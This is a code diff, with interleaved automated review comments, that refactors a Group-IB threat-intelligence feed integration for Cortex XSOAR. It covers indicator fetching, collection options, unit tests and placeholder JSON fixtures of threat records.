- """ - indicators = [] - indicators_info = MAPPING.get(collection_name, {}).get('indicators', []) - for i in indicators_info: - main_field = find_element_by_key(feed, i['main_field']) - main_field_type = i['main_field_type'] - add_fields = [] - add_fields_list = i.get('add_fields', []) + ['id'] - for j in add_fields_list: - add_fields.append(find_element_by_key(feed, j)) - add_fields_types = i.get('add_fields_types', []) + ['gibid'] - for field_type in COMMON_FIELD_TYPES: - if common_fields.get(field_type): - add_fields.append(common_fields.get(field_type)) - add_fields_types.append(field_type) - if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']: - add_fields.append(', '.join(find_element_by_key(feed, "malwareList.name"))) - add_fields_types = add_fields_types + ['gibmalwarename'] - indicators.extend(unpack_iocs(main_field, main_field_type, add_fields, - add_fields_types, collection_name)) - return indicators +def validate_launch_get_indicators_command(limit, collection_name): + try: + if limit > 50: + raise Exception("A limit should be lower than 50.") + except ValueError: + raise Exception("A limit should be a number, not a string.") + if collection_name not in COMMON_MAPPING.keys(): + raise Exception( + "Incorrect collection name. Please, choose one of the displayed options." 
+ ) -def get_human_readable_feed(indicators: list, type_: str, collection_name: str) -> str: - headers = ['value', 'type'] - for fields in MAPPING.get(collection_name, {}).get('indicators', {}): - if fields.get('main_field_type') == type_: - headers.extend(fields['add_fields_types']) - break - if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']: - headers.append('gibmalwarename') - return tableToMarkdown(f"{type_} indicators", indicators, - removeNull=True, headers=headers) - - -def format_result_for_manual(indicators: list) -> dict: - formatted_indicators: dict[str, Any] = {} - for indicator in indicators: - indicator = indicator.get('rawJSON') - type_ = indicator.get('type') - if type_ == 'CVE': - del indicator["gibsoftwaremixed"] - if formatted_indicators.get(type_) is None: - formatted_indicators[type_] = [indicator] - else: - formatted_indicators[type_].append(indicator) - return formatted_indicators - - -def handle_first_time_fetch(last_run, collection_name, first_fetch_time): - last_fetch = last_run.get('last_fetch', {}).get(collection_name) - - # Handle first time fetch - date_from = None - seq_update = None - if not last_fetch: - date_from_for_mypy = dateparser.parse(first_fetch_time) - if date_from_for_mypy is None: - raise DemistoException('Inappropriate indicators_first_fetch format, ' - 'please use something like this: 2020-01-01 or January 1 2020 or 3 days') - date_from = date_from_for_mypy.strftime('%Y-%m-%d') - else: - seq_update = last_fetch - return date_from, seq_update +""" Commands """ -""" Commands """ +def collection_availability_check(client: Client, collection_name: str) -> None: + if collection_name not in client.get_available_collections_proxy_function(): + raise Exception( + f"Collection {collection_name} is not available from you, " + "please disable collection on it or contact Group-IB to grant access" + f"{client.get_available_collections_proxy_function()}" + ) -def fetch_indicators_command(client: Client, last_run: dict, 
first_fetch_time: str, - indicator_collections: list, requests_count: int, - common_fields: dict) -> tuple[dict, list]: +def fetch_indicators_command( + client: Client, + last_run: dict, + first_fetch_time: str, + indicator_collections: list, + requests_count: int, + common_fields: dict, +) -> tuple[dict, list]: """ This function will execute each interval (default is 1 minute). 
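Review bot: `self.tags = common_fields.pop("tags", [])` in `IndicatorBuilding.__init__` removes the key from the caller's dict, and because `fetch_indicators_command` (next hunk) builds a fresh `IndicatorBuilding` from the same `common_fields` for every portion, only the indicators of the very first portion get the configured feed tags; `self.tags = common_fields.get("tags", [])` leaves the dict intact, and nothing else in the class reads that key. `DateHelper.handle_first_time_fetch` reports `{date_from}` in its `DemistoException`, but `date_from` is still `None` on that path — the offending input is `first_fetch_time`, and the message also lacks a space before "It's". `build_indicator_value_for_software_mixed` calls `next(iter(software_mixed_data.values()))` on a dict that defaults to `{}`, which raises `StopIteration` instead of yielding an empty value; add `if not software_mixed_data: return ""` before it. The `demisto.debug` calls in `find_iocs_in_feed` that print the whole `{feed}` and the final `{indicators}` list write every field of each record to the integration log, which for the compromised/account_group and compromised/bank_card_group collections presumably includes credentials and card data; log the record id and a count instead. The hunk opens inside `test_module`, whose signature is outside the hunk.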
@@ -776,28 +1285,45 @@ def fetch_indicators_command(client: Client, last_run: dict, first_fetch_time: s """ indicators = [] next_run: dict[str, dict[str, int | Any]] = {"last_fetch": {}} - tags = common_fields.pop("tags", []) + for collection_name in indicator_collections: - date_from, seq_update = handle_first_time_fetch(last_run=last_run, collection_name=collection_name, - first_fetch_time=first_fetch_time) - - generator = client.create_update_generator(collection_name=collection_name, - date_from=date_from, seq_update=seq_update) - k = 0 - for portion in generator: - for feed in portion: - seq_update = feed.get('seqUpdate') - indicators.extend(find_iocs_in_feed(feed, collection_name, common_fields)) - k += 1 - if k >= requests_count: + collection_availability_check(client=client, collection_name=collection_name) + mapping: dict = COMMON_MAPPING.get(collection_name, {}) + requests_sent = 0 + date_from, seq_update = DateHelper.handle_first_time_fetch( + last_run=last_run, + collection_name=collection_name, + first_fetch_time=first_fetch_time, + ) + + if collection_name in COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES: + hunting_rules = 1 + else: + hunting_rules = None + + portions = client.create_update_generator_proxy_functions( + collection_name=collection_name, + date_from=date_from, + sequpdate=seq_update, + apply_hunting_rules=hunting_rules, + ) + # print('portions', portions) + for portion in portions: + seq_update = portion.sequpdate + parsed_json: list[dict] = portion.parse_portion(keys=mapping.get("parser_mapping")) # type: ignore + builded_indicators = IndicatorBuilding( + parsed_json=parsed_json, + collection_name=collection_name, + common_fields=common_fields, + collection_mapping=mapping, + ).get_indicators() + + indicators.extend(builded_indicators) + requests_sent += 1 + if requests_sent >= requests_count: break - if tags: - for indicator in indicators: - indicator["fields"].update({"tags": tags}) - indicator["rawJSON"].update({"tags": tags}) - - 
next_run['last_fetch'][collection_name] = seq_update + next_run["last_fetch"][collection_name] = seq_update return next_run, indicators 
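Review bot: `collection_availability_check` (defined in the previous hunk) is called at the top of every iteration of the collection loop, and it calls `client.get_available_collections_proxy_function()` again inside its exception message, so each fetch cycle issues at least one extra API request per configured collection that is not counted against `requests_count`; fetch the list once before the loop and compare against that. The leftover `# print('portions', portions)` should go, since `demisto.debug` is already the logging path used elsewhere in this change. When a collection is absent from `COMMON_MAPPING`, `mapping` is `{}` and `portion.parse_portion(keys=None)` is called with no parser mapping; whether that is a valid call is not visible here, so either guard it or add a comment stating that `keys=None` is acceptable. The function's signature and docstring start outside the hunk.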
@@ -810,93 +1336,116 @@ def get_indicators_command(client: Client, args: dict[str, str]): :param args: arguments, provided by client. """ - id_, collection_name = args.get('id'), args.get('collection', '') - indicators = [] - raw_json = None - try: - limit = int(args.get('limit', '50')) - if limit > 50: - raise Exception('A limit should be lower than 50.') - except ValueError: - raise Exception('A limit should be a number, not a string.') + id_, collection_name, limit = ( + args.get("id"), + args.get("collection", ""), + int(args.get("limit", "50")), + ) + + validate_launch_get_indicators_command(limit, collection_name) + mapping: dict = COMMON_MAPPING.get(collection_name, {}) - if collection_name not in MAPPING.keys(): - raise Exception('Incorrect collection name. Please, choose one of the displayed options.') + indicators = [] if not id_: - generator = client.create_search_generator(collection_name=collection_name, limit=limit) - for portion in generator: - for feed in portion: - indicators.extend(find_iocs_in_feed(feed, collection_name, {})) - if len(indicators) >= limit: - indicators = indicators[:limit] - break + if collection_name in COLLECTIONS_THAT_ARE_REQUIRED_HUNTING_RULES: + apply_hunting_rules = 1 + else: + apply_hunting_rules = None + portions = client.create_update_generator_proxy_functions( + collection_name=collection_name, + limit=limit, + apply_hunting_rules=apply_hunting_rules, + ) + for portion in portions: + parsed_json = portion.parse_portion(keys=mapping.get("parser_mapping")) + builded_indicators = IndicatorBuilding( + parsed_json=parsed_json, + collection_name=collection_name, + common_fields={}, + limit=limit, + collection_mapping=mapping, + build_for_comand=True, + ).get_indicators() + indicators.extend(builded_indicators) + if len(indicators) >= limit: break else: - raw_json = client.search_feed_by_id(collection_name=collection_name, feed_id=id_) - indicators.extend(find_iocs_in_feed(raw_json, collection_name, {})) - if len(indicators) 
>= limit: - indicators = indicators[:limit] - - formatted_indicators = format_result_for_manual(indicators) - results = [] - for type_, indicator in formatted_indicators.items(): - results.append(CommandResults( - readable_output=get_human_readable_feed(indicator, type_, collection_name), - raw_response=raw_json, - ignore_auto_extract=True - )) - return results + portions = client.poller.search_feed_by_id( + collection_name=collection_name, feed_id=id_ + ) + portions.get_iocs() + parsed_json = portions.parse_portion(keys=mapping.get("parser_mapping")) + builded_indicators = IndicatorBuilding( + parsed_json=parsed_json, # type: ignore + collection_name=collection_name, + common_fields={}, + limit=limit, + collection_mapping=mapping, + build_for_comand=True, + ).get_indicators() + indicators.extend(builded_indicators) + + return indicators def main(): # pragma: no cover """ - PARSE AND VALIDATE INTEGRATION PARAMS + PARSE AND VALIDATE INTEGRATION PARAMS """ - params = demisto.params() - username = params.get('credentials').get('identifier') - password = params.get('credentials').get('password') - proxy = params.get('proxy', False) - verify_certificate = not params.get('insecure', False) - base_url = str(params.get("url")) - - indicator_collections = params.get('indicator_collections', []) - indicators_first_fetch = params.get('indicators_first_fetch', '3 days').strip() - requests_count = int(params.get('requests_count', 2)) - - args = demisto.args() - command = demisto.command() - LOG(f'Command being called is {command}') + indicator_collections = None try: + params = demisto.params() + credentials: dict = params.get("credentials") # type: ignore + username = credentials.get("identifier") + password = credentials.get("password") + proxy = params.get("proxy", False) + verify_certificate = not params.get("insecure", False) + base_url = str(params.get("url")) + + indicator_collections = params.get("indicator_collections", []) + indicators_first_fetch = 
params.get("indicators_first_fetch", "3 days").strip() + requests_count = int(params.get("requests_count", 2)) + + args = demisto.args() + command = demisto.command() + LOG(f"Command being called is {command}") + demisto.debug(f"Command being called is {command}") + client = Client( base_url=base_url, verify=verify_certificate, auth=(username, password), proxy=proxy, - headers={ - "Accept": "*/*", - "User-Agent": f"SOAR/CortexSOAR/{username}/unknown" - }) + headers={"Accept": "*/*"}, + ) - commands = {'gibtia-get-indicators': get_indicators_command} + commands = {"gibtia-get-indicators": get_indicators_command} - if command == 'test-module': + if command == "test-module": # This is the call made when pressing the integration Test button. result = test_module(client) demisto.results(result) - elif command == 'fetch-indicators': + elif command == "fetch-indicators": # Set and define the fetch incidents command to run after activated via integration settings. + tlp_color = params.get("tlp_color") + tags = argToList(params.get("feedTags")) common_fields = { - 'trafficlightprotocol': params.get("tlp_color"), - 'tags': argToList(params.get("feedTags")), + "trafficlightprotocol": tlp_color, + "tags": tags, } - next_run, indicators = fetch_indicators_command(client=client, last_run=get_integration_context(), - first_fetch_time=indicators_first_fetch, - indicator_collections=indicator_collections, - requests_count=requests_count, - common_fields=common_fields) + next_run, indicators = fetch_indicators_command( + client=client, + last_run=get_integration_context(), + first_fetch_time=indicators_first_fetch, + indicator_collections=indicator_collections, + requests_count=requests_count, + common_fields=common_fields, + ) + demisto.debug(f"fetch-indicators lenght indicators: {len(indicators)}") + set_integration_context(next_run) for b in batch(indicators, batch_size=2000): demisto.createIndicators(b) # type: ignore 
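Review bot: `int(args.get("limit", "50"))` is evaluated before `validate_launch_get_indicators_command` is called, so a non-numeric `limit` raises a bare `ValueError` here and the validator's `except ValueError` — which wraps only an `int` comparison — can never fire; move the conversion into the validator's `try` (`limit = int(limit)` as its first statement) and pass `args.get("limit", "50")` through unchanged. In the `else` branch the result of `portions.get_iocs()` is discarded; if the call does not mutate `portions` the line is dead, and if it does, a one-line comment such as `# populates the feed on the result object before parse_portion()` would save the next reader a lookup, hedged because the SDK is not visible here. `main()` now logs the command twice (`LOG(...)` and `demisto.debug(...)`); one is enough. `get_indicators_command` begins before the hunk and `main()` continues past it.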
@@ -905,9 +1454,13 @@ def main(): # pragma: no cover return_results(commands[command](client, args)) # Log exceptions - except Exception as e: - return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}') + except Exception: + return_error( + f"Failed to execute {demisto.command()} command.\n" + f"Indicator collections: {indicator_collections}.\n" + f"Error: {format_exc()}" + ) -if __name__ in ('__main__', '__builtin__', 'builtins'): +if __name__ in ("__main__", "__builtin__", "builtins"): main() diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml index 5eacfeb19ddf..180a4751c1c9 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml @@ -74,18 +74,22 @@ configuration: display: Indicator collections name: indicator_collections options: + - compromised/account_group + - compromised/bank_card_group - compromised/mule - - compromised/imei - attacks/ddos - attacks/deface - - attacks/phishing - attacks/phishing_kit + - attacks/phishing_group - hi/threat - apt/threat - osi/vulnerability + - osi/git_repository - suspicious_ip/tor_node - suspicious_ip/open_proxy - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner - malware/cnc - ioc/common type: 16 @@ -133,6 +137,7 @@ configuration: - never - interval - indicatorType + - suddenDeath - display: '' name: feedExpirationInterval type: 1 
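Review bot: `return_error` now embeds the complete `format_exc()` traceback in the operator-facing error, where the previous code surfaced only `str(e)`. Tracebacks from the HTTP layer can carry request URLs and library internals, so keep the visible text to `f"Error: {e}"` and route the traceback to `demisto.debug(format_exc())`. `format_exc` has to be imported from `traceback`; the import block is outside this hunk, so that could not be confirmed here. The enclosing `main()` starts outside the hunk.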
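Review bot: Dropping `compromised/imei` and `attacks/phishing` from the `indicator_collections` options does not clear them from instances that already selected them, and with the new `collection_availability_check` in the Python file such an instance may fail every fetch with the "is not available from you" error; a release note or a sentence in the parameter description naming the removed collections and the replacements (`attacks/phishing_group`, `compromised/account_group`, `compromised/bank_card_group`) would make the migration visible. The same list is repeated for the `collection` argument at `@@ -147` in the next hunk.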
@@ -147,18 +152,22 @@ script:
 description: GIB Collection to get indicators from.
 name: collection
 predefined:
+ - compromised/account_group
+ - compromised/bank_card_group
 - compromised/mule
- - compromised/imei
 - attacks/ddos
 - attacks/deface
- - attacks/phishing
 - attacks/phishing_kit
+ - attacks/phishing_group
 - hi/threat
 - apt/threat
 - osi/vulnerability
+ - osi/git_repository
 - suspicious_ip/tor_node
 - suspicious_ip/open_proxy
 - suspicious_ip/socks_proxy
+ - suspicious_ip/vpn
+ - suspicious_ip/scanner
 - malware/cnc
 - ioc/common
 required: true
@@ -189,7 +198,7 @@ script:
 name: gibtia-get-indicators
 deprecated: false
 execution: false
- dockerimage: demisto/python3:3.11.10.115186
+ dockerimage: demisto/vendors-sdk:1.0.0.2073752
 feed: true
 runonce: false
 script: '-'
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py
index 811b06c81a84..5406cdd29d42 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py
@@ -1,34 +1,149 @@ import pytest +import os from json import load -from GroupIB_TIA_Feed import fetch_indicators_command, Client +from GroupIB_TIA_Feed import fetch_indicators_command, Client, main +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +from cyberintegrations.cyberintegrations import Parser +# Disable insecure warnings +urllib3_disable_warnings(InsecureRequestWarning) -with open('test_data/example.json') as examples: - RAW_JSON = load(examples) -with open('test_data/results.json') as results: - RESULTS = load(results) COLLECTION_NAMES = [ - 'compromised/mule', 'compromised/imei', 'attacks/ddos', 'attacks/deface', - 'attacks/phishing', 'attacks/phishing_kit', 'apt/threat', - 'suspicious_ip/tor_node', 'suspicious_ip/open_proxy', 'suspicious_ip/socks_proxy', - 'malware/cnc', 'osi/vulnerability', 'ioc/common' + "compromised/account_group", + "compromised/bank_card_group", + "compromised/mule", + "attacks/ddos", + "attacks/deface", + "attacks/phishing_kit", + "attacks/phishing_group", + "apt/threat", + "hi/threat", + "suspicious_ip/tor_node", + "suspicious_ip/open_proxy", + "suspicious_ip/socks_proxy", + "suspicious_ip/vpn", + "suspicious_ip/scanner", + "malware/cnc", + "osi/vulnerability", + "osi/git_repository", + "ioc/common", ] +realpath = os.path.join(os.path.dirname(os.path.realpath(__file__))) -@pytest.fixture(scope='function', params=COLLECTION_NAMES, ids=COLLECTION_NAMES) +with open(f'{realpath}/test_data/avalible_collections_example.json') as example: + AVALIBLE_COLLECTIONS_RAW_JSON = load(example) + +with open(f'{realpath}/test_data/main_collections_examples.json') as example: + COLLECTIONS_RAW_JSON = load(example) + + +@pytest.fixture(scope='function', params=COLLECTION_NAMES) def session_fixture(request): - return request.param, Client(base_url='https://some.ru') + """ + Fixture for setting up a session with a client instance specific to each collection. 
+ + Given: + - COLLECTION_NAMES, a list of collection names representing different data types + that the integration handles. + + When: + - Each test function uses this fixture to set up a unique session with a particular + collection name. + + Then: + - Returns a tuple containing: + - The current collection name as a parameter for test functions that may need it. + - An instance of Client configured with the specified base URL, authentication, + and necessary headers for the integration. + - This fixture allows parameterized tests that run independently for each collection, + providing an isolated client setup for each run. + """ + return request.param, Client( + base_url="https://some-url.com", + auth=("example@roup-ib.com", "exampleAPI_TOKEN"), + verify=True, + headers={"Accept": "*/*"}, + ) + + +def test_main_error(): + """ + Test for verifying the error-handling behavior in the main() function. + + Given: + - A main() function configured to raise an exception when calling error_command. + + When: + - The main function invokes error_command(), which is expected to trigger an error. + + Then: + - Ensures that a SystemExit exception is raised as expected. + - The test checks that the main function handles errors in a predictable and controlled + manner, allowing graceful exits during failure. + """ + with pytest.raises(SystemExit): + main()["error_command"]() # type: ignore def test_fetch_indicators_command(mocker, session_fixture): + """ + Test for validating the functionality of fetch_indicators_command with multiple collection types. + + Given: + - A session_fixture that supplies a client instance configured for a specific collection + name for each test iteration. + - collection_name, the current collection name being tested (e.g., "compromised/mule"). + + When: + - The fetch_indicators_command() function is called with: + - An empty last_run dictionary to indicate that this is the initial data fetch. 
+ - first_fetch_time set based on specific collection conditions: + - For "compromised/mule", first_fetch_time is set to a fixed date of "2023-01-01". + - For "attacks/deface", first_fetch_time is set to "2024-10-01". + - For all other collections, first_fetch_time is set to "15 days" as a general + recent timeframe. + - indicator_collections set to a list containing only the current collection_name. + - requests_count set to 3, which limits the number of requests per fetch. + - common_fields set to an empty dictionary for simplicity, as no specific common + fields are required for this test. + + Then: + - Validates that: + - "last_fetch" is a key in next_run, indicating that the command updates last_run + data with the latest fetch time. + - The first indicator in the indicators list contains a "fields" dictionary with + a "gibid" key, verifying that each indicator has the expected structure. + - This test ensures that fetch_indicators_command retrieves data according to each + collection’s parameters and formats the output consistently. 
+ """ collection_name, client = session_fixture - mocker.patch.object(client, 'create_update_generator', return_value=[[RAW_JSON[collection_name]]]) - next_run, indicators = fetch_indicators_command(client=client, last_run={}, first_fetch_time='3 days', - indicator_collections=[collection_name], requests_count=1, - common_fields={}) - expected_next_run, expected_indicators = RESULTS[collection_name] - assert next_run == expected_next_run - for i in range(len(expected_indicators)): - raw_json = indicators[i].get("rawJSON") - expected_raw_json = expected_indicators[i].get("rawJSON") - assert sorted(raw_json.items()) == sorted(expected_raw_json.items()) + if collection_name == "compromised/mule": + first_fetch_time = "2023-01-01" + elif collection_name == "attacks/deface": + first_fetch_time = "2024-10-01" + else: + first_fetch_time = "15 days" + + mocker.patch.object(client, 'get_available_collections_proxy_function', return_value=AVALIBLE_COLLECTIONS_RAW_JSON) + mocker.patch.object(client, 'create_update_generator_proxy_functions', return_value=[ + Parser(chunk=COLLECTIONS_RAW_JSON[collection_name], keys=[], iocs_keys=[])]) + + next_run, indicators = fetch_indicators_command( + client=client, + last_run={}, + first_fetch_time=first_fetch_time, + indicator_collections=[collection_name], + requests_count=3, + common_fields={} + ) + + assert "last_fetch" in next_run, ( + "Expected 'last_fetch' key in next_run to indicate the last data retrieval time." + ) + if len(indicators) > 0: + assert "gibid" in indicators[0].get('fields'), ( + "Expected 'gibid' field in the first indicator's 'fields' dictionary, ensuring each indicator " + "includes unique identifier data." + ) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt index ef025362ab44..f584d23a1ab4 100644 
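Review bot: The `gibid` check in test_fetch_indicators_command is wrapped in `if len(indicators) > 0:`, so a regression where a collection parses to zero indicators passes silently; the version being removed compared against expected results per collection, and this rewrite keeps no such floor. Assert non-emptiness before inspecting the first item, `assert indicators, f"no indicators parsed for {collection_name}"`, or keep per-collection expected counts in the fixture. `test_main_error` calls `main()` with no demisto params mocked and expects `SystemExit`; any failure inside main() satisfies that, and main() does not appear to return a dict, so `main()["error_command"]` is never reached — mock `demisto.command` to return an unsupported command and assert on the text passed to return_error instead. The new fixture name `avalible_collections_example.json` is misspelled; harmless, but easiest to fix while the file is new.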
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/command_examples.txt
@@ -1 +1 @@
-!gibtia-get-indicators collection=compromised/mule
\ No newline at end of file
+!gibtia-get-indicators collection=ioc/common
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json
new file mode 100644
index 000000000000..8ac723ea3d9b
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json
@@ -0,0 +1,38 @@
+[
+ "apt/threat",
+ "apt/threat_actor",
+ "hi/threat",
+ "hi/threat_actor",
+ "attacks/ddos",
+ "attacks/deface",
+ "attacks/phishing_group",
+ "attacks/phishing_kit",
+ "compromised/access",
+ "compromised/account_group",
+ "compromised/bank_card_group",
+ "compromised/breached",
+ "compromised/discord",
+ "compromised/masked_card",
+ "compromised/messenger",
+ "compromised/mule",
+ "compromised/reaper",
+ "ioc/common",
+ "malware/cnc",
+ "malware/config",
+ "malware/malware",
+ "malware/signature",
+ "malware/yara",
+ "osi/git_repository",
+ "osi/public_leak",
+ "osi/vulnerability",
+ "suspicious_ip/open_proxy",
+ "suspicious_ip/scanner",
+ "suspicious_ip/socks_proxy",
+ "suspicious_ip/tor_node",
+ "suspicious_ip/vpn",
+ "compromised/breached",
+ "compromised/account_group",
+ "compromised/reaper",
+ "compromised/bank_card_group",
+ "attacks/phishing_group"
+]
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json
deleted file mode 100644
index 278a37493b94..000000000000
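Review bot: `avalible_collections_example.json` lists `compromised/breached`, `compromised/account_group`, `compromised/reaper`, `compromised/bank_card_group` and `attacks/phishing_group` twice. If that mirrors a real response from the collections endpoint it is worth a short comment next to the fixture load in the test module (JSON itself allows none), because it then exercises how the feed de-duplicates; otherwise drop the repeats so the fixture does not mask that behaviour by accident.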
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json
+++ /dev/null
@@ -1,713 +0,0 @@ -{ - "compromised/mule": { - "account": "3765123456411567", - "cnc": { - "cnc": "http://some.ru", - "domain": "worus.space", - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": "11.11.11.11", - "provider": null, - "region": null - }, - "ipv6": null, - "url": "http://some.ru" - }, - "dateAdd": "2020-11-11T16:09:00+00:00", - "dateIncident": null, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "amber", - "ttl": 30 - }, - "id": "50a3b4abbfca5dcbec9c8b3a110598f61ba93r33", - "info": null, - "isFavourite": false, - "isHidden": false, - "malware": { - "id": "5a2b741f8593f88178623848573abc899f9157d4", - "name": "Anubis" - }, - "oldId": "392993084", - "organization": { - "bic": null, - "bicRu": null, - "bsb": null, - "iban": null, - "name": "SOME BANK", - "swift": null - }, - "person": { - "address": null, - "birthday": null, - "city": null, - "countryCode": null, - "email": null, - "name": null, - "passport": null, - "phone": null, - "state": null, - "taxNumber": null, - "zip": null - }, - "portalLink": "https://bt.group-ib.com/cd/mules?searchValue=id:50a3b4abbfca5dcbec9c8b3a110598f61ba90a99", - "seqUpdate": 1614413286419, - "sourceType": "Botnet", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - }, - "type": "Person" - }, - "compromised/imei": { - "client": { - "ipv4": { - "asn": "AS22222 Some Company", - "city": null, - "countryCode": "NL", - "countryName": "Netherlands", - "ip": "11.11.11.11", - "provider": "Some Company", - "region": null - } - }, - "cnc": { - "cnc": "http://some.ru", - "domain": "some.ru", - "ipv4": { - "asn": "AS16276 OVH SAS", - "city": null, - "countryCode": "FR", - "countryName": "France", - "ip": "11.11.11.11", - "provider": "OVH SAS", - "region": null - }, - "ipv6": null, - "url": "http://some.ru" - }, - "dateCompromised": null, - 
"dateDetected": "2018-01-11T01:18:43+00:00", - "device": { - "iccid": ",~", - "imei": "359223056231009", - "imsi": ",~", - "model": "Nexus S/2.3.7 ($$$Flexnet v.5.5)", - "os": null - }, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": 30 - }, - "id": "0c1426048474df19ada9d0089ef8b3efce906556", - "isFavourite": false, - "isHidden": false, - "malware": { - "id": "8790a290230b3b4c059c2516a6adace1eac16066", - "name": "FlexNet" - }, - "oldId": "396766002", - "operator": { - "countryCode": null, - "name": null, - "number": ",~" - }, - "portalLink": "https://bt.group-ib.com/cd/imei?searchValue=id:0c1426048474df19ada9d0089ef8b3efce906556", - "seqUpdate": 1614889064899, - "sourceType": "Botnet", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - } - }, - "attacks/ddos": { - "cnc": { - "cnc": "isc.org", - "domain": "isc.org", - "ipv4": { - "asn": "AS1280 Internet Systems Consortium, Inc.", - "city": "Redwood City", - "countryCode": "US", - "countryName": "United States", - "ip": "11.11.11.11", - "provider": "Internet Systems Consortium", - "region": "California" - }, - "ipv6": null, - "url": null - }, - "dateBegin": "2020-10-16T02:58:53+00:00", - "dateEnd": "2020-10-16T02:58:55+00:00", - "dateReg": "202-10-16", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 90, - "reliability": 90, - "severity": "red", - "tlp": "green", - "ttl": 30 - }, - "id": "26a05baa4025edff367b058b13c6b43e820538a5", - "isFavourite": false, - "isHidden": false, - "malware": null, - "messageLink": null, - "oldId": "394657345", - "portalLink": "https://bt.group-ib.com/attacks/ddos?searchValue=id:26a05baa4025edff367b058b13c6b43e820538a5", - "protocol": "udp", - "seqUpdate": 1614476823510, - "target": { - "ipv4": { - "asn": "AS1298 Comcast Cable Communications", - "city": "Some city", - "countryCode": "US", - "countryName": "United 
States", - "ip": "11.11.11.11", - "provider": "Comcast Cable", - "region": "Washington" - }, - "url": null, - "category": null, - "domainsCount": 0, - "port": 55843, - "domain": null - }, - "threatActor": null, - "type": "DNS Reflection" - }, - "attacks/deface": { - "contacts": [], - "date": "2021-01-12T02:22:18+00:00", - "evaluation": { - "admiraltyCode": "B2", - "credibility": 80, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "id": "6009637a1135cd001ef46e21", - "portalLink": "https://bt.group-ib.com/attacks/deface?searchValue=id:6009637a1135cd001ef46e21", - "seqUpdate": 26326167, - "source": "www.some.org", - "targetDomain": "sadas.sadd.ee", - "targetDomainProvider": null, - "targetIp": { - "asn": null, - "city": "", - "countryCode": null, - "countryName": "Indonesia", - "ip": "11.11.11.11", - "provider": null, - "region": null - }, - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - }, - "url": "sadas.sadd.ee" - }, - "attacks/phishing": { - "dateBlocked": null, - "dateDetected": "2021-01-14T11:21:34+00:00", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 90, - "severity": "red", - "tlp": "amber", - "ttl": 30 - }, - "history": [ - { - "date": "2021-01-13T11:20:50+00:00", - "field": "Detected", - "reason": "In response", - "reporter": "Group-IB Intelligence", - "value": "In response" - }, - { - "date": "2021-01-14T11:20:50+00:00", - "field": "Status has been changed", - "reason": ",-", - "reporter": "Group-IB Intelligence", - "value": "In response" - } - ], - "id": "fce7f92d0b64946cf890842d083953649b259952", - "ipv4": { - "asn": null, - "city": "Some city", - "countryCode": "CA", - "countryName": "Canada", - "ip": "11.11.11.11", - "provider": "Some provider", - "region": "NA" - }, - "isFavourite": false, - "isHidden": false, - "oldId": "396798526", - "phishingDomain": { - "domain": "some.ru", - "local": "some.ru", - 
